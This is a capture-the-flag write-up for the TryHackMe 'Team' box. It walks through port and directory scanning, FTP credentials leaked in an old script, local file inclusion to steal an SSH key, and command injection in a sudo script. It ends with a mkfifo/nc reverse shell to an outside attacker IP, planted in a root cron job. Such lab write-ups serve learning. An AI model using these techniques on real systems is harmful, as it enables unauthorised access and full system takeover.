# CTF TryHackMe - Team

## Nmap
```bash
nmap -sC -sV -oN nmap.log 10.10.43.111
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 12:24 EDT
Nmap scan report for 10.10.43.111
Host is up (0.076s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
|   256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_  256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.79 seconds
```
And i added **team.thm** in my **/etc/hosts**

## Gobuster
```bash
gobuster dir -u http://team.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,js,txt,html 
/index.html           (Status: 200) [Size: 2966]
/images               (Status: 301) [Size: 305] [--> http://team.thm/images/]
/scripts              (Status: 301) [Size: 306] [--> http://team.thm/scripts/]
/assets               (Status: 301) [Size: 305] [--> http://team.thm/assets/] 
/robots.txt           (Status: 200) [Size: 5] 
```
I found **Scripts** directory interessting, so i run gobuster again with scripts directory. (robots.txt content wasn't usefull *dale*)

```bash
gobuster dir -u http://team.thm/scripts -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,js,txt,html  
/script.txt           (Status: 200) [Size: 597]
```
i go to  **http://team.thm/scripts/script.txt** and got this script :
```bash
#!/bin/bash
read -p "Enter Username: " REDACTED
read -sp "Enter Username Password: " REDACTED
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit

# Updated version of the script
# Note to self had to change the extension of the old "script" in this folder, as it has creds in
```

So i go to **http://team.thm/scripts/script.old** and i got creds
```bash 
#!/bin/bash
read -p "Enter Username: " ftpuser
read -sp "Enter Username Password: " T3@m$h@r3
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit
```

## FTP Access
So i can now connect to the FTP as **ftpuser**

- I have listed directory
- Go into workshare
- Get New_site.txt file

```bash
ftp team.thm      
Connected to team.thm.
220 (vsFTPd 3.0.3)
Name (team.thm:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 65534    65534        4096 Jan 15 21:25 workshare
226 Directory send OK.
ftp> cd workshare
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          269 Jan 15 21:24 New_site.txt
226 Directory send OK.
ftp> get New_site.txt
```
The content of *New_site.txt* was :
```
Dale
        I have started coding a new website in PHP for the team to use, this is currently under development. It can be
found at ".dev" within our domain.

Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file.

Gyles 
```
We know 2 potential usernames :
- Dale
- Gyles

Also, i added **dev.team.thm** into my **/etc/hosts**

## dev.team.thm

I go to **http://dev.team.thm**
click on the link present in the web page.

I got this url : **http://dev.team.thm/script.php?page=teamshare.php**

## LFI
I saw the parameter **?page=** so i tried lfi inclusion 

```bash
wfuzz -c -w ./lfi.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
```

I got multiple response 200, i saw **/etc/ssh/sshd_config**
```
http://dev.team.thm/script.php?page=../../../../../../../etc/ssh/sshd_config
```

At the end this file i got dale's id_rsa

## SSH Access
```bash
ssh -i id_rsa dale@team.thm
```
Now check sudo permissions

```bash
dale@TEAM:~$ sudo -l                                                          
Matching Defaults entries for dale on TEAM:                                                                                                                                                                                                   
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                                                                         
                                                                                                                                                                                                                                              
User dale may run the following commands on TEAM:                                                                                                                                                                                             
    (gyles) NOPASSWD: /home/gyles/admin_checks
```

i check the content of **admin_check**

```bash
#!/bin/bash
                                                                                                                                                                                                                                              
printf "Reading stats.\n"                                                                                                                                                                                                                     
sleep 1                                                                                                                                                                                                                                       
printf "Reading stats..\n"                                                                                                                                                                                                                    
sleep 1                                                                                                                                                                                                                                       
read -p "Enter name of person backing up the data: " name                                                                                                                                                                                     
echo $name  >> /var/stats/stats.txt                                                                                                                                                                                                           
read -p "Enter 'date' to timestamp the file: " error                                                                                                                                                                                          
printf "The Date is "                                                                                                                                                                                                                         
$error 2>/dev/null
```

i saw the variable **$error** is not interpreted so we can launch the script as gyles and specify **/bin/bash** to the second entry

```bash
dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks

Reading stats..                                                                
Reading stats..                                                          
Enter name of person backing up the data: hackss                                                                                                                                                                                              
Enter 'date' to timestamp the file: /bin/bash
The Date is 
id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
```

We are **gyles**. To get a better shell let's add ssh key

```bash
cd .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIvubC4ePXK+Zc9hIG7B3/AjxTukZuHLUbCcvHkKOTooSWG5srR3/0uV+UqFZavfZu0mGGfltZ8Yr9MOwXYKfDZ84ROZPjZX0OV4yJTMtmj9w6qHJZOcjJRmdbosiuiRw7TXtmeIesVWVHKmOIPx9ZZa8vS/cJr/QdFrtxbuh+uSBCnrjgjKIQpF0yDd2IcSnmlKRi+aFgIPXAuF/uShlB2BvLQljjlvJDpCE7Pg4Zf96bdIR8kubSshUGmz4XIq57VkbG7Xv+EQ0gw+pjN4/3CpokPhsPqSh8kIscoahtLnUwff431D85N6qnaQLtHy3zIAhRkWp92mFMkvgazkw4CRYWSKww1xmnTLXBfp7Rk+uKJERzYDPvF5vwUMdQhpMzC3jOYxvUuv02YDQVfYrh3kXiKyToa8sZDuTITotibIdJ6V1WJ4Eaps53lfbmhhnQHGtshEFTlHSNrdX4lAjP732tyXUjPX9uCK7wU+dHQ1UGB0n/eKzB6jt+sv6ugOM= kali@kali" > authorized_keys
```

Now we can **ssh -i keyfile gyles@team.thm**

## SSH Access as Gyles 
I run linpeas to get information to priv esc.

I got interesting infos :
```
/usr/local/bin/main_backup.sh                                         
/opt/admin_stuff
```

I checked the content the permissions of **main_backup.sh**
```bash
gyles@TEAM:/home$ cat /usr/local/bin/main_backup.sh                        
#!/bin/bash                                                                                                                                                                                                                                   
cp -r /var/www/team.thm/* /var/backups/www/team.thm/

gyles@TEAM:/home$ ls -la /usr/local/bin/main_backup.sh                     
-rwxrwxr-x 1 root admin 65 Jan 17 20:36 /usr/local/bin/main_backup.sh
```

We are in admin group so we can write into this file.

Now i checked the content of **script.sh**

```bash
gyles@TEAM:/home$ cat /opt/admin_stuff/script.sh
#!/bin/bash
#I have set a cronjob to run this script every minute


dev_site="/usr/local/sbin/dev_backup.sh"
main_site="/usr/local/bin/main_backup.sh"
#Back ups the sites locally
$main_site
$dev_site
```
We see this script is running every minute and call main_backup.sh
so let's do a reverse shell.

## Reverse shell to get Root

```bash
gyles@TEAM:/home$ cat /usr/local/bin/main_backup.sh 
#!/bin/bash
#cp -r /var/www/team.thm/* /var/backups/www/team.thm/

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.9.188.66 9001 >/tmp/f
```

in my machine i start a listener

```bash
nc -lvnp 9001
```

Wait a minute and we'rrr root :)
